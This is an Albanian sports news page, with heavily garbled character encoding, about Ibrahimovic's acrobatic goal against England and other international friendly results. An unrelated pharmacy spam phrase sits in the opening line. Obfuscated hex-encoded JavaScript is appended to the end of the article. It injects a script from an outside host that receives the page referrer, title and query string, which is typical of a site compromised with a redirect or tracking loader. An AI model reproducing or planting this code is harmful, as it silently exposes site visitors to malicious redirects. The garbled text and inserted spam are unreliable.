largea_5576956801353026886

a�?Modestia�? Ibra: Goli im meriton notA�n 10

buy gabapentin uk. NjA� gol shokues, emocionues e dhe qA� nga ana teknike shkon pA�rtej imagjinatA�s. Edhe pse Zlatan Ibrahimovic nuk bA�n pjesA� tek ajo kategori e lojtarA�ve qA� inspirojnA� ndenja simpatie, e luan kA�tA� rol goli i tij.

Akrobacia gjeniale e realizuar gjatA� ndeshjes me AnglinA� konsiderohet tashmA� si njA� perlA�. Edhe vetA� suedezi A�shtA� i vetA�dijshA�m pA�r kA�tA� dhe pA�r tA� mos dalA� jashtA� karakterit tA� tij nuk mund tA� tregohej modest pA�r kA�tA� arritje:

a�?Kur pashA� portierin jashtA� porte mendova ta kapA�rceja atA�, njA� tentativA� qA� rezultoi mA� se e sukseshme pasi pA�rfundimi ishte njA� gol fantastik. Padiskutim qA� ky gol meriton notA�n 10a�?, deklaroi sulmuesi dhe nA� kA�tA� rast A�shtA� e pamundur ta kundA�rshtosh.

Ibra mund i vetA�m AnglinA�, shA�non golin mA� tA� bukur tA� historisA�!

TA� mA�dhenjtA� e EvropA�s nuk nxjerrin dot njA� fitues nA� Amsterdam. Holanda dhe Gjermania barazojnA� 0-0 sfidA�n mes tyre nA� kryeqyetin e portokallinjve, pavarsisht se dhurojnA� njA� 90 minutA�sh plot emocione mes tyre, ku tA� dyja skuadrat krijojnA� raste me thasA� pA�r tA� ngritur nA� kA�mbA� a�?Amsterdam ArenA�na�?. PA�r GjermaninA� madje mundA�sitA� mA� tA� mira i kanA� dy ftubollistA�t e Dortmund Gotze dhe Gundogan, ndA�rsa nA� krahun tjetA�r mA� i rrezikshmi A�shtA� Arjen Roben por qA� nuk gjen sic duhet koordinatat e portA�s gjermane, qA� nA� fund prodhon njA� 0-0 mes dy fqinjA�ve. Suedia realizon njA� tjetA�r pA�rmbysje, pas asaj me GjermaninA�, vetA�m se kA�tA� herA� viktima e skandinavA�ve A�shtA� Anglia. Zllatan Ibrahimovic A�shtA� ylli i mbrA�mjes qA� realizon njA� poker nA� portA�n e tre luanA�ve, tA� cilA�ve I vijnA� mendtA� vA�rdallA� nga aftA�sitA� e yllit tA� Paris Sent Zhermen.

AnglezA�t madje nuk ja dalin dot ibrA�s dhe pse arrijnA� tA� krijojnA� njA� avantazh 2-1 nA� fraksionin e parA� pas kthimit tA� rezultatit me gola tA� Welbeck dhe Caulker. Republika Ceke fiton derbin me SllovakinA�. NA� PragA� vendasit nuk zhgA�njejnA� pA�rballA� fqinjA�ve tA� tyre, duke triumfuar pastA�r me rezultatin 3-0. Heroi I cekA�ve A�shtA� sulmuesi i Jablonec David Lafata, qA� shA�non njA� dygolA�sh nA� gjashtA� minutat e para tA� ndeshjes, ndA�rsa golin e tretA� e realizon Dockal nA� fraksionin e dytA�. Ndeshje dramatike mes dy superfuqive tA� politikA�s botA�rore Rusi dhe SHBA. Skuadra e Kapelos nuk ruan njA� avantazh tA� dyfishtA� me Smolov dhe Shirokov, pasi arrihet dy herA� nga amerikanA�t qA� shA�nojnA� me Bredli dhe Diskerud, ku ky i fundit realizon nA� minutA�n e 93-te.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}